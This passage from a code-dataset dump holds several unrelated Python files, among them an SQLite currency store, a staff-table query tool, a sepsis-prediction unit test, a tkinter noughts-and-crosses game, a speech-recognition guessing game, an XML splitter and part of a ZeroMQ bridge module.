values\nprint(list(shelfFile.keys()))\nprint(list(shelfFile.values()))\n\nshelfFile.close()","sub_path":"Part2_AutomatingTasks/Scripts/shelfDemo.py","file_name":"shelfDemo.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"496950263","text":"import sqlite3\n\ndef connect():\n    conn=sqlite3.connect('currency.db')\n    cur=conn.cursor()\n    cur.execute(\"CREATE TABLE IF NOT EXISTS currencies(id INTEGER PRIMARY KEY, day TEXT, current_money INTEGER, currency INTEGER)\")\n    conn.commit()\n    conn.close()\n\ndef insert(day,current_money,currency):\n    conn=sqlite3.connect('currency.db')\n    cur=conn.cursor()\n    cur.execute(\"INSERT INTO currencies VALUES (NULL,?,?,?)\",(day,current_money,currency))\n    conn.commit()\n    conn.close()\n\ndef view():\n    conn=sqlite3.connect('currency.db')\n    cur=conn.cursor()\n    cur.execute(\"SELECT * FROM currencies\")\n    rows=cur.fetchall()\n    conn.close()\n    return rows\n\ndef search(day=\"\",currenct_money=\"\",currency=\"\"):\n    conn=sqlite3.connect('currency.db')\n    cur=conn.cursor()\n    cur.execute(\"SELECT * FROM currencies WHERE day=? OR current_money=? 
OR currency=?\",(day,currenct_money,currency))\n rows=cur.fetchall()\n conn.close()\n return rows\n\ndef delete(id):\n conn=sqlite3.connect(\"currency.db\")\n cur=conn.cursor()\n cur.execute(\"DELETE FROM currencies WHERE id=?\",(id,))\n conn.commit()\n conn.close()\n\ndef accessing_items_in_db(a):\n conn=sqlite3.connect('currency.db')\n cur=conn.cursor()\n cur.execute(\"SELECT * FROM currencies\")\n rows=cur.fetchall()\n li=[]\n if a==\"day\":\n for item in rows:\n li.append(item[1])\n elif a==\"current_money\":\n for item in rows:\n li.append(item[2])\n elif a==\"currencies\":\n for item in rows:\n li.append(item[3])\n else:\n print(\"Please try again with: 'day' or 'current_money' or 'currencies'\")\n return li\n\n\nconnect()\n","sub_path":"Currency/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"318259988","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2018/4/10 0010 9:47\n# @Author : chelin\n# @File : stuff_manage.py\n# @Software: PyCharm\nimport os\n\nfrom tabulate import tabulate\n\nDB_FILE = \"staff.db\"\nCOLUMNS = ['id', 'name', 'age', 'phone', 'dept', 'enrolled_date']\n\n\ndef load_db(db_file):\n \"\"\"\n 加载员工信息表,并转成指定格式\n :param db_file:\n :return:\n \"\"\"\n data = {}\n for i in COLUMNS:\n data[i] = []\n\n f = open(db_file, \"r\", encoding=\"utf-8\")\n for line in f:\n staff_id, name, age, phone, dept, enrolled_date = line.split(\",\")\n data['id'].append(staff_id)\n data['name'].append(name)\n data['age'].append(age)\n data['phone'].append(phone)\n data['dept'].append(dept)\n data['enrolled_date'].append(enrolled_date)\n\n return data\n\n\ndef save_db():\n \"\"\"sync data back to db each time after editing\"\"\"\n f = open(\"%s_tmp\" % DB_FILE, \"w\", encoding=\"utf-8\")\n\n for index, val in enumerate(STAFF_DATA[COLUMNS[0]]):\n row = [str(val)]\n for col in COLUMNS[1:]:\n row.append(str(STAFF_DATA[col][index]))\n\n raw_row = \",\".join(row)\n f.write(raw_row+\"\\n\")\n f.close()\n os.rename(\"%s_tmp\" % DB_FILE, DB_FILE)\n\n\ndef syntax_parser(cmd):\n \"\"\"\n 解析语句\n :param cmd:\n :return:\n \"\"\"\n syntax_list = {\n 'find': syntax_find,\n 'add': syntax_add,\n 'update': syntax_update,\n 'delete': syntax_delete,\n }\n # 将语句按空格分割\n if cmd.split()[0] in ['find', 'add', 'update', 'delete'] and \"staff_table\" in cmd:\n # print(cmd.split()[0])\n\n if 'where' in cmd:\n query_cmd, where_clause = cmd.split(\"where\")\n # print(query_cmd, where_clause)\n\n matched_data = syntax_where(where_clause.strip())\n if matched_data: # 有匹配结果\n action_name = cmd.split()[0]\n syntax_list[action_name](query_cmd, matched_data) # 调用对应的action方法\n else:\n syntax_list[cmd.split()[0]](cmd, STAFF_DATA) # 没有where,使用所有数据\n\n else:\n print_log('''语法错误!\\nsample:[find/add/update/delete] name,age from [staff_table] where [id][>/</=/like][2]''',\n 'error')\n\n\ndef syntax_where(clause):\n \"\"\"\n 解析where条件,并查询数据\n :param clause: where条件,e.g. 
name=alex\n :return: False or matched data dict\n \"\"\"\n\n query_data = {} # 存储查询出来的结果\n operators = {'>': op_gt,\n '<': op_lt,\n '=': op_eq,\n 'like': op_like}\n query_condition_matched = False # 如果匹配语句都没有匹配上\n for op_key, op_func in operators.items():\n if op_key in clause:\n q_name, q_condition = clause.split(op_key)\n print(\"query:\", q_name.strip(), q_condition.strip())\n if q_name.strip() in STAFF_DATA:\n matched_data = op_func(q_name.strip(), q_condition.strip()) # 调用对应的方法\n return matched_data\n else:\n print_log(\"字段'%s' 不存在!\" % q_name, 'error')\n\n if not query_condition_matched:\n print(\"\\033[31;1mError:语句条件%s不支持\\033[0m\" % clause)\n return False\n\n\ndef op_gt(q_name, q_condition):\n \"\"\"\n find records q_name great than q_condition\n :param q_name: 查找条件key\n :param q_condition: 查找条件value\n :return:\n \"\"\"\n matched_data = {} # 把符合条件的数据都放这\n for k in STAFF_DATA:\n matched_data[k] = []\n\n q_condition = float(q_condition)\n for index, i in enumerate(STAFF_DATA[q_name]):\n if float(i) > q_condition:\n for k in matched_data:\n matched_data[k].append(STAFF_DATA[k][index]) # 把匹配的数据都添加都matched_data里\n\n print(\"matched:\", matched_data)\n\n return matched_data\n\n\ndef op_lt(q_name, q_condition):\n \"\"\"\n find records q_name less then q_condition\n :return:\n \"\"\"\n matched_data = {} # 把符合条件的数据都存储起来\n for k in STAFF_DATA:\n matched_data[k] = []\n\n q_condition = float(q_condition)\n for index, i in enumerate(STAFF_DATA[q_name]):\n if float(i) < q_condition:\n for k in matched_data:\n matched_data[k].append(STAFF_DATA[k][index])\n\n print(\"matched:\", matched_data)\n\n return matched_data\n\n\ndef op_eq(q_name, q_condition):\n \"\"\"\n find records q_name equal q_condition\n :return:\n \"\"\"\n matched_data = {} # 把符合条件的数据都存储起来\n for k in STAFF_DATA:\n matched_data[k] = []\n\n q_condition = float(q_condition)\n for index, i in enumerate(STAFF_DATA[q_name]):\n if float(i) == q_condition:\n for k in matched_data:\n matched_data[k].append(STAFF_DATA[k][index])\n\n print(\"matched:\", matched_data)\n\n return matched_data\n\n\ndef op_like(q_name, q_condition):\n \"\"\"\n find records where q_name like q_condition\n :param q_name: 查找条件key\n :param q_condtion: 查找条件value\n :return:\n \"\"\"\n matched_data = {} #把符合条件的数据存储\n for k in STAFF_DATA:\n matched_data[k] = []\n\n for index, value in enumerate(STAFF_DATA[q_name]):\n if q_condition in value:\n for k in matched_data:\n matched_data[k].append(STAFF_DATA[k][index]) #把匹配的数据都添加matched_data里\n\n #print(\"matched:\", matched_data)\n return matched_data\n\n\ndef syntax_find(query_clause, matched_data):\n \"\"\"\n find 语句\n :param query_clause:eg. 
find age,name from staff_table\n :param matched_data: where方法匹配到的数据\n :return:\n \"\"\"\n\n filter_keys = query_clause.split('find')[1].split('find')[0]\n print(query_clause.split('find')[1])\n columns = [i.strip() for i in filter_keys.split(',')]\n # 要过滤出来的字段\n if \"*\" in columns:\n if len(columns) == 1: # 只有find * from ...成立,*不能与其他字段同时出现\n columns = COLUMNS\n else:\n print_log(\"* 不能同时与其他字段一起出现\", \"error\")\n return False\n if len(columns) == 1:\n if not columns[0]:\n print_log(\"语法错误,find和from之间必须跟字段名或*\", \"error\")\n return False\n filtered_data = []\n for index, val in enumerate(matched_data[columns[0]]):\n # 拿要查找的多列的第一个元素,[name, age, dept],拿到name,到数据库匹配,然后这一列的每个值的索引到其他列表里依次找\n row = [val, ]\n # if columns[1:]: # 代表是多列过滤\n for col in columns[1:]:\n row.append(matched_data[col][index])\n print(\"row\", row)\n filtered_data.append(row)\n\n print(tabulate(filtered_data, headers=columns, tablefmt=\"grid\"))\n print_log(\"匹配到 %s 条记录\" % len(filtered_data))\n\n\ndef syntax_add(query_clause, matched_data):\n \"\"\"\n sample: add staff Alex li,25,1231231231,IT,2015-10-29\n :param query_clause: add staff Alex,25,1231231231,IT,2015-10-29\n :param matched_data:\n :return:\n \"\"\"\n column_vals = [col.strip() for col in query_clause.split(\"valuse\")[1].split(',')]\n # print(\"cols',column_vals)\n if len(column_vals) == len(COLUMNS[1:]):\n\n # find max id first, and then plus one, becomes the id of this new record\n init_staff_id = 0\n for i in STAFF_DATA['id']:\n if int(i) > init_staff_id:\n init_staff_id = int(i)\n\n init_staff_id += 1 # 当前最大id再+ 1\n STAFF_DATA['id'].append(init_staff_id)\n for index, col in enumerate(COLUMNS[1:]):\n STAFF_DATA[col].append(column_vals[index])\n\n else:\n print_log(\"提供的字段数据不足,必须字段%s\" % COLUMNS[1:], 'error')\n\n print(tabulate(STAFF_DATA, headers=COLUMNS))\n save_db()\n print_log(\"成功添加1条记录到staff_table表\")\n\n\ndef syntax_update(query_clause, matched_data):\n pass\n\n\ndef syntax_delete(query_clause, matched_data):\n pass\n\n\ndef print_log(msg, msg_type='info'):\n if msg_type == \"error\":\n print(\"\\033[31;1mError:%s\\033[0m\" % msg)\n else:\n print(\"\\033[32;1mInfo:%s\\033[0m\" % msg)\n\n\ndef main():\n \"\"\"\n 程序主入口\n :return:\n \"\"\"\n while True:\n cmd = input(\"[staff db]:\").strip()\n if not cmd: continue\n syntax_parser(cmd)\n\n\nSTAFF_DATA = load_db(DB_FILE)\nprint(STAFF_DATA)\n\nmain()\n","sub_path":"stuff_manage.py","file_name":"stuff_manage.py","file_ext":"py","file_size_in_byte":8547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"140535701","text":"import unittest\n\nfunc = __import__(\"func\")\n\nclass TestFunc(unittest.TestCase):\n\n def check_data(self, biomarkers, expectedResult) :\n #resp, code, headers = func.main(biomarkers)\n resp, code = func.main(biomarkers)\n self.assertEqual(resp[\"issepsis\"], expectedResult)\n self.assertEqual(code, 200)\n #self.assertEqual(headers[\"content-type\"], \"application/json\")\n return biomarkers, expectedResult\n\n def test_func(self) :\n\n #test no sepsis\n data = {\n \"HR\":103,\n \"O2Sat\":90,\n \"Temp\": None,\n \"SBP\": None,\n \"MAP\": None,\n \"DBP\": None,\n \"Resp\":30,\n \"EtCO2\": None,\n \"BaseExcess\":21,\n \"HCO3\":45,\n \"FiO2\": None,\n \"pH\":7.37,\n \"PaCO2\":90,\n \"SaO2\":91,\n \"AST\":16,\n \"BUN\":14,\n \"Alkalinephos\":98,\n \"Calcium\":9.3,\n \"Chloride\":85,\n \"Creatinine\":0.7,\n \"Glucose\":193,\n \"Lactate\": None,\n \"Magnesium\":2,\n \"Phosphate\":3.3,\n \"Potassium\":3.8,\n \"Bilirubin_total\":0.3,\n 
\"Hct\":37.2,\n \"Hgb\":12.5,\n \"PTT\": None,\n \"WBC\":5.7,\n \"Fibrinogen\": None,\n \"Platelets\":317\n}\n\n # test yes sepsis\n data2 = {\n \"HR\":72.0,\n \"O2Sat\":96.0,\n \"Temp\": None,\n \"SBP\":103.0,\n \"MAP\":62.0,\n \"DBP\":45.0,\n \"Resp\":20.0,\n \"EtCO2\": None,\n \"BaseExcess\":-1.0,\n \"HCO3\": None,\n \"FiO2\": None,\n \"pH\":7.4,\n \"PaCO2\":36.0,\n \"SaO2\":98.0,\n \"AST\": None,\n \"BUN\": None,\n \"Alkalinephos\": None,\n \"Calcium\": None,\n \"Chloride\": None,\n \"Creatinine\": None,\n \"Glucose\": None,\n \"Lactate\": None,\n \"Magnesium\": None,\n \"Phosphate\": None,\n \"Potassium\": None,\n \"Bilirubin_total\": None,\n \"Hct\": None,\n \"Hgb\": None,\n \"PTT\": None,\n \"WBC\": None,\n \"Fibrinogen\": None,\n \"Platelets\": None\n}\n \n #run tests\n self.check_data(biomarkers = data, expectedResult = 0)\n self.check_data(biomarkers = data2, expectedResult = 1)\n\n # test with missing fields\n # no sepsis ..for some reason if we remove Temp from list the expected result is wrong. TODO: investigate\n data = {\n \"HR\":103,\n \"O2Sat\":90,\n \"Temp\": None,\n \"Resp\":30,\n \"BaseExcess\":21,\n \"HCO3\":45,\n \"pH\":7.37,\n \"PaCO2\":90,\n \"SaO2\":91,\n \"AST\":16,\n \"BUN\":14,\n \"Alkalinephos\":98,\n \"Calcium\":9.3,\n \"Chloride\":85,\n \"Creatinine\":0.7,\n \"Glucose\":193,\n \"Magnesium\":2,\n \"Phosphate\":3.3,\n \"Potassium\":3.8,\n \"Bilirubin_total\":0.3,\n \"Hct\":37.2,\n \"Hgb\":12.5,\n \"WBC\":5.7,\n \"Platelets\":317\n}\n\n #sepsis\n data2 = {\n \"HR\":72.0,\n \"O2Sat\":96.0,\n \"SBP\":103.0,\n \"MAP\":62.0,\n \"DBP\":45.0,\n \"Resp\":20.0,\n \"BaseExcess\":-1.0,\n \"pH\":7.4,\n \"PaCO2\":36.0,\n \"SaO2\":98.0\n}\n\n print(\"******Checking missing biomarkers*****\")\n self.check_data(data, 0)\n self.check_data(data2, 1)\n\n \nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"serving/fn/test_func.py","file_name":"test_func.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"17203515","text":"import tkinter as tk\r\nfrom tkinter import*\r\nimport math\r\npersonplaying =\"O\"\r\nb =\"b\"\r\nmaster = Tk()\r\n#our 2d array for our grid\r\ntwodarray =[[b,b,b],\r\n [b,b,b],\r\n [b,b,b]]\r\nwinner =\"\"\r\nmoves =0\r\n\r\ndef finish():\r\n global master\r\n global winner\r\n global moves\r\n moves =0\r\n output = str(winner)+\" is \\n the winner\"\r\n winnerb =Label(width =300,height =300)\r\n winnerb.place(x=10,y=10)\r\n winner =Label(text=output,width =10,height =5)\r\n winner.place(x=10,y=10)\r\n playagain = Button(text =\"play again\",command =loading)\r\n playagain.place(x=10,y =70)\r\n #refreshes the 2d array\r\n twodarray[0][0] =\"b\"\r\n twodarray[0][1] =\"b\"\r\n twodarray[0][2] =\"b\"\r\n \r\n twodarray[1][0] =\"b\"\r\n twodarray[1][1] =\"b\"\r\n twodarray[1][2] =\"b\"\r\n \r\n twodarray[2][0] =\"b\"\r\n twodarray[2][1] =\"b\"\r\n twodarray[2][2] =\"b\"\r\n personplaying =\"O\"\r\n\r\n\r\ndef a1move():\r\n global x\r\n global y\r\n x =0\r\n y =0\r\n move()\r\ndef a2move():\r\n global x\r\n global y\r\n x =1\r\n y =0\r\n move()\r\ndef a3move():\r\n global x\r\n global y\r\n x =2\r\n y =0\r\n move()\r\ndef b1move():\r\n global x\r\n global y\r\n x =0\r\n y =1\r\n move()\r\ndef b2move():\r\n global x\r\n global y\r\n x =1\r\n y =1\r\n move()\r\ndef b3move():\r\n global x\r\n global y\r\n x =2\r\n y =1\r\n move()\r\ndef c1move():\r\n global x\r\n global y\r\n x =0\r\n y =2\r\n move()\r\ndef c2move():\r\n global x\r\n global y\r\n x =1\r\n y 
=2\r\n move()\r\ndef c3move():\r\n global x\r\n global y\r\n x =2\r\n y =2\r\n move()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef move():\r\n global personplaying\r\n global twodarrary\r\n global winner\r\n global moves\r\n print(x,y)\r\n moves =moves +1\r\n #picks the symbol to draw on the grid\r\n if personplaying ==\"X\":\r\n personplaying =\"O\"\r\n else:\r\n personplaying =\"X\"\r\n twodarray[y][x] =personplaying\r\n print(twodarray[0])\r\n print(twodarray[1])\r\n print(twodarray[2])\r\n oso = Label(text =personplaying,height =1,width =2)\r\n oso.config(font=('Comic Sans MS', 45, 'bold italic'))\r\n\r\n\r\n #deciding who has won\r\n if twodarray[0][0] ==twodarray[0][1] and twodarray[0][1] == twodarray[0][2]:\r\n if twodarray[0][0] != \"b\":\r\n print(twodarray[0][0] ,\"is the winner\")\r\n winner = twodarray[0][0]\r\n finish()\r\n elif twodarray[1][0] ==twodarray[1][1] and twodarray[1][1] == twodarray[1][2]:\r\n if twodarray[1][0] != \"b\":\r\n winner = twodarray[1][0]\r\n print(twodarray[1][0] ,\"is the winner\")\r\n finish()\r\n elif twodarray[2][0] ==twodarray[2][1] and twodarray[2][1] == twodarray[2][2]:\r\n if twodarray[2][0] != \"b\":\r\n winner =twodarray[2][0]\r\n print(twodarray[2][0] ,\"is the winner\")\r\n finish()\r\n \r\n elif twodarray[0][0] ==twodarray[1][0] and twodarray[1][0] == twodarray[2][0]:\r\n if twodarray[0][0] != \"b\":\r\n winner = twodarray[0][0]\r\n print(twodarray[0][0] ,\"is the winner\")\r\n finish()\r\n elif twodarray[0][1] ==twodarray[1][1] and twodarray[1][1] == twodarray[2][1]:\r\n if twodarray[0][1] != \"b\":\r\n winner = twodarray[0][1]\r\n print(twodarray[0][1] ,\"is the winner\")\r\n finish()\r\n elif twodarray[0][2] ==twodarray[1][2] and twodarray[1][2] == twodarray[2][2]:\r\n if twodarray[0][2] != \"b\":\r\n winner = twodarray[0][2]\r\n print(twodarray[0][2] ,\"is the winner\")\r\n finish()\r\n \r\n elif twodarray[0][0] ==twodarray[1][1] and twodarray[1][1] == twodarray[2][2]:\r\n if twodarray[0][0] != \"b\":\r\n winner = twodarray[0][0]\r\n print(twodarray[0][0] ,\"is the winner\")\r\n finish()\r\n elif twodarray[0][2] ==twodarray[1][1] and twodarray[1][1] == twodarray[2][0]:\r\n if twodarray[0][2] != \"b\":\r\n winner = twodarray[0][2]\r\n print(twodarray[0][2] ,\"is the winner\")\r\n finish()\r\n if moves ==9:\r\n winner =\"nobody\"\r\n print(\"nobody is the winner\")\r\n finish()\r\n\r\n oso.place(x=10+(x*80),y=10+(y*85))\r\n\r\ndef startup():\r\n global master\r\n twodarray =[[b,b,b],\r\n [b,b,b],\r\n [b,b,b]]\r\n winnerb =Label(width =300,height =300)\r\n winnerb.place(x=10,y=10)\r\n #draws the buttons\r\n a1 = Button(text=\" \",height = 5,width =10,command = a1move)\r\n a1.place( x=10,y=10)\r\n \r\n a2 = Button(text=\" \",height = 5,width =10,command = a2move)\r\n a2.place(x=90,y=10)\r\n \r\n a3 = Button(text=\" \",height = 5,width =10,command = a3move)\r\n a3.place(x=170,y=10)\r\n \r\n b1 = Button(text=\" \",height = 5,width =10,command = b1move)\r\n b1.place( x=10,y=95)\r\n \r\n b2 = Button(text=\" \",height = 5,width =10,command = b2move)\r\n b2.place(x=90,y=95)\r\n \r\n b3 = Button(text=\" \",height = 5,width =10,command = b3move)\r\n b3.place(x=170,y=95)\r\n \r\n c1 = Button(text=\" \",height = 5,width =10,command = c1move)\r\n c1.place(x=10,y=180)\r\n \r\n c2 = Button(text=\" \",height = 5,width =10,command = c2move)\r\n c2.place( x=90,y=180)\r\n \r\n c3 = Button(text=\" \",height = 5,width =10,command = c3move)\r\n c3.place(x=170,y=180)\r\n \r\n\r\n\r\n \r\n\r\n\r\ndef loading():\r\n global master\r\n twodarray =[[b,b,b],\r\n [b,b,b],\r\n 
[b,b,b]]\r\n winner =\"\"\r\n\r\n winnerb =Label(width =300,height =300)\r\n winnerb.place(x=10,y=10)\r\n startup1 = Label(text=\"naughts and crosses \\n -by Tom Leigh-\")\r\n startup1.place(x=10,y=10)\r\n\r\n startupb = Button(text=\"click here to \\n start the game\",command = startup)\r\n startupb.place(x=22,y=45)\r\nloading()\r\n","sub_path":"nac.py","file_name":"nac.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"611200458","text":"import random\nimport time\nimport speech_recognition as sr\nimport sys\n\n\ndef EnterGameLogic():\n\n WORDS = [\"昂首闊步\", \"碧海青天\", \"拔刀相助\", \"安安穩穩\", \"奔走相告\", \"愛人以德\"]\n NUM_GUESSES = 3\n PROMPT_LIMIT = 5\n\n answer = random.choice(WORDS)\n\n response = {\n \"success\": True,\n \"error\": None,\n \"transcription\": None\n }\n\n instructions = (\n \"請由以下的成語中猜中一個:\\n\"\n \"{words}\\n\"\n \"每次遊玩共有{n}機會。\\n\"\n ).format(words=', '.join(WORDS), n=NUM_GUESSES)\n # create recognizer and mic instances\n print(instructions)\n guess_counter = 0\n #prompt_counter= 0\n rec = sr.Recognizer()\n mic = sr.Microphone()\n rec.energy_threshold = 300\n audio_clip = None\n if not isinstance(rec, sr.Recognizer):\n raise TypeError(\"`recognizer` must be `Recognizer` instance\")\n\n if not isinstance(mic, sr.Microphone):\n raise TypeError(\"`microphone` must be `Microphone` instance\")\n\n with mic as source:\n rec.adjust_for_ambient_noise(source)\n audio_clip = rec.listen(source)\n\n\n while 1:\n guess_counter += 1\n #print('進行第 {} 次猜看看. 請說:'.format(guess_counter))\n print(\"進行辨識,\")\n guess = rec.recognize_google(audio_clip, language=\"zh-TW\")\n res = response\n try: \n res[\"transcription\"] = guess\n except sr.RequestError:\n res[\"success\"] = False\n res[\"error\"] = \"Google語音API無法使用\"\n except sr.UnknownValueError:\n res[\"error\"] = \"您的輸入有���題,請重新啟動程式\"\n #print(guess)\n if not res[\"success\"]:\n break\n \n # 如果程式發生錯誤,跳出while-loop\n if res[\"error\"]:\n print(\"發生錯誤: {}\".format(res[\"error\"]))\n break\n \n # 輸出玩家講的結果\n print(\"你/妳的答案: {}\".format(res[\"transcription\"]))\n #進行答案比對及計算使用者是否可以再繼玩\n guess_is_correct = res[\"transcription\"] == answer\n user_has_more_attempts = guess_counter < NUM_GUESSES\n if guess_is_correct:\n print(\"答對了,恭喜你/妳獲得獎金:.......100萬(顆石頭)\".format(answer))\n break\n elif user_has_more_attempts:\n print(\"不對喔,不過你/妳還有{}次機會.\\n\".format(guess_counter))\n else:\n print(\"抱歉,沒猜中耶,\\n正確答案是: '{}'.\".format(answer))\n break\n\nif __name__==\"__main__\":\n EnterGameLogic()\n","sub_path":"audio/takeguess_game_v1_debug.py","file_name":"takeguess_game_v1_debug.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"40681453","text":"#!/usr/bin/env python3\n\n# https://stackoverflow.com/questions/36155049/splitting-xml-file-into-multiple-at-given-tags\n# Plus some optional input/wrappering\n\nimport argparse\nimport sys\nimport os\nimport xml.etree.ElementTree as ET\n\nparser = argparse.ArgumentParser()\nparser.add_argument('inputxml', metavar='[XML to split]',\n help='XML file you need to split')\nparser.add_argument('outputdir', metavar='[Output directory]',\n help='Output directory for split MARCXML')\nargs = parser.parse_args()\n\noutputdir = args.outputdir\n\ntry:\n os.mkdir(outputdir)\nexcept FileExistsError:\n sys.exit('Output directory already exists. 
Quitting!')\n\n\n# Right now this doesn't check if the file exists before\n# trying to read it...\nwith open(args.inputxml) as xmlfile:\n xmltosplit = ET.iterparse(xmlfile, events=('end', ))\n for event, elem in xmltosplit:\n ldr = None\n ctrlfld = None\n bibid = None\n datafld = None\n barcode = None\n record = None\n\n if elem.tag == 'record':\n ldr = elem.find('leader').text[6:8]\n ctrlfld = elem.findall('controlfield')\n for cf in ctrlfld:\n if cf.attrib['tag'] == '001':\n bibid = cf.text\n datafld = elem.findall('datafield')\n for df in datafld:\n if df.attrib['tag'] == '955':\n for dfc in df.getchildren():\n if dfc.attrib['code'] == 'b':\n barcode = dfc.text\n\n newrec = ET.Element('collection')\n newrec.insert(0, elem)\n record = ET.ElementTree(newrec)\n\n outputxmlname = '{0}_{1}_{2}.xml'.format(bibid, barcode, ldr)\n outputdest = os.path.join(outputdir, outputxmlname)\n\n record.write(outputdest, xml_declaration=True, encoding='utf-8',\n method='xml')\n\n\n# BIBID - BARCODE - LEADER 06-07 - DOT - XML\n","sub_path":"xmlsplit/xmlsplit.py","file_name":"xmlsplit.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"197011139","text":"from .Interactor import Interactor\nimport bqplot as bq\nimport ipywidgets as ipy\nimport numpy as np\n\n\nclass SegmentSelector(Interactor):\n\n def __init__(self, title=\"Segment Selector: \"):\n # mark to draw over the image plot also used to\n # define the bounding box for which the segment is defined\n self.segment_mark = None\n self.segment_drawer = None # segment drawing interactor\n # upon which diagonal to draw the segment\n # within the selected bounding box\n self.segment_draw_diagonal = False\n self.title = title\n\n def link_with(self, display_pane):\n super().link_with(display_pane)\n\n self.segment_mark, self.segment_drawer = self.make_segment_mark_and_drawer()\n\n self.ipy_controls = ipy.HBox([\n ipy.Label(self.title),\n self.make_segment_draw_mode_toggler(),\n self.make_segment_draw_diag_switch()\n ])\n\n super().set_image_plot_marks([self.segment_mark])\n\n def make_segment_mark_and_drawer(self):\n mark = bq.Lines(\n scales=self.display_pane.image_plot_scales,\n x=[0.40, 0.60],\n y=[0.40, 0.60]\n )\n\n drawer = bq.interacts.BrushSelector(\n x_scale=self.display_pane.image_plot_scales['x'],\n y_scale=self.display_pane.image_plot_scales['y'],\n color='blue'\n )\n\n def on_interaction(change):\n if change['name'] == 'selected_x':\n mark.x = np.empty(\n shape=(0,)) if change['new'] is None else change['new']\n elif change['name'] == 'selected_y':\n if change['new'] is None:\n mark.y = np.empty(shape=(0,))\n else:\n if self.segment_draw_diagonal:\n mark.y = list(reversed(change['new']))\n else:\n mark.y = change['new']\n self.update_observers()\n\n drawer.observe(on_interaction, ['selected_x', 'selected_y'])\n\n return mark, drawer\n\n def make_segment_draw_mode_toggler(self):\n togglebutton = ipy.ToggleButton(\n value=False,\n tooltip='Edit Segment Selector',\n icon='edit'\n )\n\n def on_toggle(change):\n if change['new']:\n self.display_pane.set_interaction(self.segment_drawer)\n else:\n self.display_pane.clear_interaction()\n\n togglebutton.observe(on_toggle, 'value')\n self.display_pane.add_to_togglebutton_group(togglebutton)\n return togglebutton\n\n def make_segment_draw_diag_switch(self):\n button = ipy.Button(\n value=False,\n icon='arrows-h',\n tooltip='Swap Segment Selector Direction'\n )\n\n def handle_click(_change):\n 
self.segment_draw_diagonal = not self.segment_draw_diagonal\n            self.segment_mark.y = list(reversed(self.segment_mark.y))\n            self.update_observers()\n\n        button.on_click(handle_click)\n\n        return button\n","sub_path":"DisplayPane/Interactor/SegmentSelector.py","file_name":"SegmentSelector.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"397799540","text":"def dSum(n):\n    s = 0\n    for i in range(1, n - 1):\n        if n % i == 0:\n            s += i\n    return s\n\nT = int(input())\nfor t in range(T):\n    x = int(input())\n    if dSum(x) < 2 * x: print(1)\n    else: print(0)","sub_path":"Code/CodeRecords/2212/49405/258574.py","file_name":"258574.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"240428095","text":"\nimport zmq\nimport errno\nimport msgpack\n\nimport threading as mt\n\nfrom ..logger import Logger\nfrom ..profile import Profiler\n\n\n# --------------------------------------------------------------------------\n#\n# zmq will (rightly) barf at interrupted system calls. We are able to rerun\n# those calls.\n#\n# This is presumably rare, and repeated interrupts increasingly unlikely.\n# More than, say, 3 point to races or I/O thrashing\n#\n# FIXME: how does that behave wrt. timeouts? We probably should include\n# an explicit timeout parameter.\n#\n# kudos: https://gist.github.com/minrk/5258909\n#\ndef no_intr(f, *args, **kwargs):\n\n    _max = 3\n    cnt = 0\n    while True:\n        try:\n            return f(*args, **kwargs)\n\n        except zmq.ContextTerminated:\n            return None # connect closed or otherwise became unusable\n\n        except zmq.ZMQError as e:\n            if e.errno == errno.EINTR:\n                if cnt > _max:\n                    raise # interrupted too often - forward exception\n                cnt += 1\n                continue # interrupted, try again\n            raise # some other error condition, raise it\n\n\n# ------------------------------------------------------------------------------\n#\ndef log_bulk(log, bulk, token):\n\n    if not bulk:\n      # log.debug(\"%s: None\", token)\n        return\n\n    if hasattr(bulk, 'read'):\n        bulk = msgpack.unpack(bulk)\n\n    if not isinstance(bulk, list):\n        bulk = [bulk]\n\n    if isinstance(bulk[0], dict) and 'arg' in bulk[0]:\n        bulk = [e['arg'] for e in bulk]\n\n    if isinstance(bulk[0], dict) and 'uid' in bulk[0]:\n        for e in bulk:\n            log.debug(\"%s: %s [%s]\", token, e['uid'], e.get('state'))\n    else:\n        for e in bulk:\n            log.debug(\"%s: ?\", str(token))\n            log.debug(\"%s: %s\", token, str(e)[0:32])\n\n\n# ------------------------------------------------------------------------------\n#\nclass Bridge(object):\n    '''\n\n    A bridge can be configured to have a finite lifetime: when no messages are\n    received in `timeout` seconds, the bridge process will terminate.\n    '''\n\n    # --------------------------------------------------------------------------\n    #\n    def __init__(self, cfg):\n\n        self._cfg = cfg\n        self._channel = self._cfg.channel\n        self._uid = self._cfg.uid\n        self._log = Logger(name=self._uid, ns='radical.utils',\n                           level='DEBUG', path=self._cfg.path)\n        self._prof = Profiler(name=self._uid, path=self._cfg.path)\n\n        self._prof.prof('init3', uid=self._uid, msg=self._cfg.path)\n        self._log.debug('bridge %s init', self._uid)\n\n        self._bridge_initialize()\n\n\n    # --------------------------------------------------------------------------\n    #\n    @property\n    def channel(self):\n        return self._channel\n\n\n    # 
